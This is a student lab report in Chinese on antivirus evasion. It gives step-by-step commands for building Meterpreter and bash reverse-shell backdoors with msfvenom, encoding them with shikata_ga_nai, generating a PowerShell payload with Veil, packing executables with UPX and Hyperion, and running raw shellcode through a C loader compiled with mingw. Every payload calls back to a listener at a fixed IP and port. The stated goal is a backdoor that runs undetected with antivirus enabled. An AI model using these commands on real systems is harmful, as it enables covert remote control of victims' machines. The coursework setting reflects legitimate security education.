Exp3免杀原理与实践

一、实验内容

  1、方法

    正确使用msf编码器

    msfvenom生成如jar之类的其他文件

    veil

         加壳工具

         使用C + shellcode编程

         使用其他课堂未介绍方法

  2、通过组合应用各种技术实现恶意代码免杀

  3、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

二、实验步骤

  1、方法

  ①正确使用msf编码器

   将实验二的后门程序拿到virustotal检测,我们发现大多数杀软都能检测到该后门程序

   

 

   

   接下来我们使用msf编码器对该程序进行编码再来检测看看

    msfvenom --list encoders 查看可以使用的编码方式

   选择这种 x86/shikata_ga_nai 方式进行编码

   先一次编码: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai-b '\x00' LHOST=192.168.227.128 LPORT=5127 -f exe >20175113.exe 

   再八次编码: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 8 -b '\x00' LHOST=192.168.227.128 LPORT=5127 -f exe >20175127cd2.exe 

   分别的检测情况如下图:

    

 

 

    

    

 

 

 

  ②msfvenom生成如jar之类的其他文件

   生成java文件: msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.227.128 LPORT=5127 x> 20175127.jar 

   生成bash文件: msfvenom -p cmd/unix/reverse_bash LHOST=192.168.227.128 LPORT=5127 -f raw > 20175127.sh 

   分别的检测情况如下图:

   

   

  ③veil工具

   安装veil: sudo apt-get install veil-evasion 

   进入veil: veil 

   使用第一个: use 1 

    list 列出所有的payload, use 22 选择第22个powershell/meterpreter/rev_tcp方式

   设置反弹连接的参数:

set LHOST 192.168.227.128 //ip地址
set LPORT 5127            //端口
generate                  //生成
20175127                  //设置生成文件名

 

   检测情况如下:

   

   

  ④加壳工具

   对①中编码一次的程序进行压缩壳upx加壳: upx 20175127.exe -o 20175127.upxed.exe 

   对①中编码一次的程序进行加密壳Hyperion加壳:

    复制该文件到hyperion文件夹中: cp 20175127.exe /usr/share/windows-resources/hyperion/20175127.exe 

    进入hyperion文件夹中: cd /usr/share/windows-resources/hyperion/ 

    加壳操作: wine hyperion.exe -v 20175127.exe 20175127.upxed.Hy.exe 

   分别的检测情况如下:

   

   

  ⑤使用C+shellcode编程

   使用msfconsole生成shellcode: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.227.128 LPORT=5127 -f c 

   新建一个5127.c文件:(将生成的shellcode内容复制到buf[]=后面)

#include <stdio.h>
unsigned char buf[]=//生成的shellcode
int main()
{
    int (*func)()=(int(*)())buf;//调用shellcode
    func();
}

 

 

 

   安装mingw-w64程序: apt-get install mingw-w64 

   使用mingw-w64将5127.c文件生成exe文件: i686-w64-mingw32-g++ 5113sc.c -o 5127.exe 

   检测情况如下: